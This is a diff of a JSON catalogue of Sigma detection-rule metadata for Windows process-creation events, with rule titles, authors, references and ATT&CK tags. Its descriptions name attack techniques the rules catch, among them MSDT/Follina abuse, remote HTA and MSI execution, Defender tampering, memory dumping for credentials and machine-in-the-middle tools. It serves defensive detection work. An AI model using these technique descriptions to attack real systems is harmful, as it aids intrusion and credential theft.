"process_creation", - "logsource.product": "windows", - "refs": [ - "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc_spawn_shell.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.003" - ] - }, - "uuid": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", - "value": "MMC Spawning Windows Shell" - }, - { - "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", - "meta": { - "author": "frack113", - "creation_date": "2022/08/19", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_modify_group_policy_settings.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_modify_group_policy_settings.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1484.001" - ] - }, - "uuid": "ada4b0c4-758b-46ac-9033-9004613a150d", - "value": "Modify Group Policy Settings" - }, - { - "description": "Detects modification of an existing service on a compromised host in order to execute an arbitrary payload when the service is started or killed as a method of persistence.", - "meta": { - "author": "Sreeman", - "creation_date": "2020/09/29", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_modif_of_services_for_via_commandline.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://pentestlab.blog/2020/01/22/persistence-modify-existing-service/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_modif_of_services_for_via_commandline.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1543.003", - "attack.t1574.011" - ] - }, - "uuid": "38879043-7e1e-47a9-8d46-6bec88e201df", - "value": "Modification Of Existing Services For Persistence" - }, - { - "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded", - "meta": { - "author": "Sreeman", - "creation_date": "2020/10/29", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_monitoring_for_persistence_via_bits.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html", - "https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1197" - ] - }, - "uuid": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", - "value": "Monitoring For Persistence Via BITS" - }, - { - "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", - "meta": { - "author": "Cian Heasley", - "creation_date": "2020/08/13", - "falsepositive": [ - "Legitimate uses of Mouse Lock software" - ], - "filename": "proc_creation_win_mouse_lock.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf", - "https://sourceforge.net/projects/mouselock/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mouse_lock.yml" - ], - "tags": [ - "attack.credential_access", - "attack.collection", - "attack.t1056.002" - ] - }, - "uuid": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", - "value": "Mouse Lock Credential Gathering" - }, - { - "description": "Detects file execution using the msdeploy.exe lolbin", - "meta": { - "author": "Beyu Denis, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "System administrator Usage" - ], - "filename": "proc_creation_win_msdeploy.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/", - "https://twitter.com/pabraeken/status/995837734379032576", - "https://twitter.com/pabraeken/status/999090532839313408", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdeploy.yml" - ], - "tags": [ - "attack.execution", "attack.t1218" ] }, - "uuid": "646bc99f-6682-4b47-a73a-17b1b64c9d34", - "value": "Execute Files with Msdeploy.exe" + "uuid": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", + "value": "Sideloading Link.EXE" }, { - "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", + "description": "Detects a suspicious script executions from temporary folder", "meta": { - "author": "Nasreddine Bencherchali (rule)", - "creation_date": "2022/05/29", + "author": "Florian Roth, Max Altgelt, Tim Shelton", + "creation_date": "2021/07/14", + "falsepositive": [ + "Administrative scripts" + ], + "filename": "proc_creation_win_susp_script_exec_from_temp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_temp.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "value": "Suspicious Script Execution From Temp Folder" + }, + { + "description": "Detects suspicious FromBase64String expressions in command line arguments", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/01/29", + "falsepositive": [ + "Administrative script libraries" + ], + "filename": "proc_creation_win_powershell_frombase64string.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_frombase64string.yml" + ], + "tags": [ + "attack.t1027", + "attack.defense_evasion", + "attack.t1140", + "attack.t1059.001" + ] + }, + "uuid": "e32d4572-9826-4738-b651-95fa63747e8a", + "value": "FromBase64String Command Line" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/20", + "falsepositive": [ + "Legitimate use of AnyDesk from a non-standard folder" + ], + "filename": "proc_creation_win_anydesk_susp_folder.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_susp_folder.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", + "value": "Use of Anydesk Remote Access Software from Suspicious Folder" + }, + { + "description": "Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/04", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_msdt.yml", + "filename": "proc_creation_win_proc_dump_rdrleakdiag.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/nao_sec/status/1530196847679401984", - "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", - "https://twitter.com/_JohnHammond/status/1531672601067675648", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ] - }, - "uuid": "258fc8ce-8352-443a-9120-8a11e4857fa5", - "value": "Execute Arbitrary Commands Using MSDT.EXE" - }, - { - "description": "Detects diagcab leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in CVE-2022-30190", - "meta": { - "author": "GossiTheDog (rule), frack113 (sigma version)", - "creation_date": "2022/06/09", - "falsepositive": [ - "Legitimate usage of \".diagcab\" files" - ], - "filename": "proc_creation_win_msdt_diagcab.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab", - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0", - "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_diagcab.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ] - }, - "uuid": "6545ce61-a1bd-4119-b9be-fcbee42c0cf3", - "value": "Execute MSDT.EXE Using Diagcab File" - }, - { - "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/21", - "falsepositive": [ - "Legitimate usage of \".diagcab\" files" - ], - "filename": "proc_creation_win_msdt_susp_cab_options.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/nas_bench/status/1537896324837781506", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ] - }, - "uuid": "dc4576d4-7467-424f-9eee-fd2b02855fe0", - "value": "MSDT.EXE Execution With Suspicious Cab Option" - }, - { - "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", - "meta": { - "author": "Nextron Systems", - "creation_date": "2022/06/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_msdt_susp_parent.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/nao_sec/status/1530196847679401984", - "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_parent.yml" + "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml" ], "tags": [ "attack.defense_evasion", "attack.t1036", - "attack.t1218" + "attack.t1003.001" ] }, - "uuid": "7a74da6b-ea76-47db-92cc-874ad90df734", - "value": "MSDT Executed with Suspicious Parent" - }, - { - "description": "Detects the suspicious minimized start of MsEdge browser, which can be used to download files from the Internet", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/11", - "falsepositive": [ - "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" - ], - "filename": "proc_creation_win_msedge_minimized_download.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mrd0x/status/1478234484881436672?s=12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msedge_minimized_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "94771a71-ba41-4b6e-a757-b531372eaab6", - "value": "Suspicious Minimized MSEdge Start" - }, - { - "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_mshta_http.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_http.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.005" - ] - }, - "uuid": "b98d0db6-511d-45de-ad02-e82a98729620", - "value": "Mshta Remotely Hosted HTA File Execution" - }, - { - "description": "Identifies suspicious mshta.exe commands.", - "meta": { - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_mshta_javascript.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.005" - ] - }, - "uuid": "67f113fa-e23d-4271-befa-30113b3e08b1", - "value": "Mshta JavaScript Execution" + "uuid": "6355a919-2e97-4285-a673-74645566340d", + "value": "RdrLeakDiag Process Dump" }, { "description": "Detects a Windows command line executable started from MSHTA", @@ -42720,209 +34666,1030 @@ "value": "MSHTA Spawning Windows Shell" }, { - "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", + "description": "Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n", "meta": { "author": "frack113", - "creation_date": "2022/04/24", + "creation_date": "2021/12/26", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_msiexec_dll.yml", + "filename": "proc_creation_win_susp_cipher.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", - "https://twitter.com/_st0pp3r_/status/1583914515996897281", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_dll.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-3---overwrite-deleted-data-on-c-drive", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cipher.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1218.007" + "attack.impact", + "attack.t1485" ] }, - "uuid": "84f52741-8834-4a8c-a413-2eb2269aa6c8", - "value": "Suspicious Msiexec Load DLL" + "uuid": "4b046706-5789-4673-b111-66f25fe99534", + "value": "Overwrite Deleted Data with Cipher" }, { - "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", - "meta": { - "author": "frack113", - "creation_date": "2022/04/16", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_msiexec_embedding.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_embedding.yml" - ], - "tags": [ - "attack.t1218.007", - "attack.defense_evasion" - ] - }, - "uuid": "4a2a2c3e-209f-4d01-b513-4155a540b469", - "value": "Suspicious MsiExec Embedding Parent" - }, - { - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/16", - "falsepositive": [ - "Legitimate script" - ], - "filename": "proc_creation_win_msiexec_execute_dll.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://twitter.com/_st0pp3r_/status/1583914515996897281", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ] - }, - "uuid": "6f4191bb-912b-48a8-9ce7-682769541e6d", - "value": "Suspicious Msiexec Execute Arbitrary DLL" - }, - { - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/16", - "falsepositive": [ - "Legitimate script" - ], - "filename": "proc_creation_win_msiexec_install_quiet.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://twitter.com/_st0pp3r_/status/1583914244344799235", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ] - }, - "uuid": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", - "value": "Suspicious Msiexec Quiet Install" - }, - { - "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", + "description": "Detects usage of Sysinternals PsService for service reconnaissance or tamper", "meta": { "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/28", + "creation_date": "2022/06/16", "falsepositive": [ - "Unknown" + "Legitimate use of PsService by an administrator" ], - "filename": "proc_creation_win_msiexec_install_remote.yml", + "filename": "proc_creation_win_sysinternals_psservice.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml" + "https://docs.microsoft.com/en-us/sysinternals/downloads/psservice", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1218.007" + "attack.discovery", + "attack.persistence", + "attack.t1543.003" ] }, - "uuid": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", - "value": "Suspicious Msiexec Quiet Install From Remote Location" + "uuid": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", + "value": "Use of Sysinternals PsService" }, { - "description": "Detects process injection using Microsoft Remote Asssistance (Msra.exe) which has been used for discovery and persistence tactics", + "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", "meta": { - "author": "Alexander McDonald", - "creation_date": "2022/06/24", + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2021/12/27", "falsepositive": [ - "Legitimate use of Msra.exe" + "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" ], - "filename": "proc_creation_win_msra_process_injection.yml", + "filename": "proc_creation_win_susp_download_office_domain.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/", - "https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msra_process_injection.yml" + "https://twitter.com/an0n_r0/status/1474698356635193346?s=12", + "https://twitter.com/mrd0x/status/1475085452784844803?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml" ], - "tags": [ - "attack.defense_evasion", - "attack.t1055" - ] + "tags": "No established tags" }, - "uuid": "744a188b-0415-4792-896f-11ddb0588dbc", - "value": "Msra.exe Process Injection" + "uuid": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", + "value": "Suspicious Download from Office Domain" }, { - "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt", "meta": { - "author": "frack113", - "creation_date": "2022/01/07", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/22", "falsepositive": [ - "WSL (Windows Sub System For Linux)", - "Other currently unknown software" + "Unknown" ], - "filename": "proc_creation_win_mstsc.yml", + "filename": "proc_creation_win_persistence_typed_paths.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc.yml" + "https://forensafe.com/blogs/typedpaths.html", + "https://twitter.com/dez_/status/1560101453150257154", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_persistence_typed_paths.yml" ], "tags": [ - "attack.lateral_movement", - "attack.t1021.001" + "attack.persistence" ] }, - "uuid": "954f0af7-62dd-418f-b3df-a84bc2c7a774", - "value": "Remote Desktop Protocol Use Mstsc" + "uuid": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", + "value": "Persistence Via TypedPaths - CommandLine" }, { - "description": "Detects multiple suspicious process in a limited timeframe", + "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries", "meta": { - "author": "juju4", - "creation_date": "2019/01/16", + "author": "Florian Roth", + "creation_date": "2021/01/22", "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], - "filename": "proc_creation_win_multiple_susp_cli.yml", + "filename": "proc_creation_win_apt_unc2452_cmds.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_cmds.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f", + "value": "UNC2452 Process Creation Patterns" + }, + { + "description": "Detects reg command lines that disable certain important features of Microsoft Defender", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/22", + "falsepositive": [ + "Rare legitimate use by administrators to test software (should always be investigated)" + ], + "filename": "proc_creation_win_reg_defender_tampering.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/swagkarna/Defeat-Defender-V1.2.0", + "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_tampering.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "452bce90-6fb0-43cc-97a5-affc283139b3", + "value": "Registry Defender Tampering" + }, + { + "description": "Detects modification of an existing service on a compromised host in order to execute an arbitrary payload when the service is started or killed as a method of persistence.", + "meta": { + "author": "Sreeman", + "creation_date": "2020/09/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_modif_of_services_for_via_commandline.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentestlab.blog/2020/01/22/persistence-modify-existing-service/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_modif_of_services_for_via_commandline.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.003", + "attack.t1574.011" + ] + }, + "uuid": "38879043-7e1e-47a9-8d46-6bec88e201df", + "value": "Modification Of Existing Services For Persistence" + }, + { + "description": "Detect usage of the \"defaultpack.exe\" binary as a proxy to launch other programs", + "meta": { + "author": "frack113", + "creation_date": "2022/12/31", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_defaultpack.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/", + "https://www.echotrail.io/insights/search/defaultpack.exe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_defaultpack.yml" + ], + "tags": [ + "attack.t1218", + "attack.defense_evasion", + "attack.execution" + ] + }, + "uuid": "b2309017-4235-44fe-b5af-b15363011957", + "value": "Lolbin Defaultpack.exe Use As Proxy" + }, + { + "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. AppData)", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/08/24", + "falsepositive": [ + "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897", + "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962" + ], + "filename": "proc_creation_win_susp_csc_folder.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", + "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/", + "https://twitter.com/gN3mes1s/status/1206874118282448897", + "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csc_folder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.004" + ] + }, + "uuid": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", + "value": "Suspicious Csc.exe Source File Folder" + }, + { + "description": "Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. The files will be written to %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_installutil_download.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/239", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", + "value": "Suspicious Execution of InstallUtil To Download" + }, + { + "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/24", + "falsepositive": [ + "Very unlikely" + ], + "filename": "proc_creation_win_hack_inveigh.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", + "https://github.com/Kevin-Robertson/Inveigh", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_inveigh.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", + "value": "Inveigh Hack Tool" + }, + { + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "meta": { + "author": "Tim Burrell", + "creation_date": "2020/02/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_gallium.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212", + "attack.command_and_control", + "attack.t1071" + ] + }, + "uuid": "18739897-21b1-41da-8ee4-5b786915a676", + "value": "GALLIUM Artefacts" + }, + { + "description": "Detects suspicious command line patterns as seen being used by MERCURY threat actor", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/26", + "falsepositive": [ + "Unknown" + ], 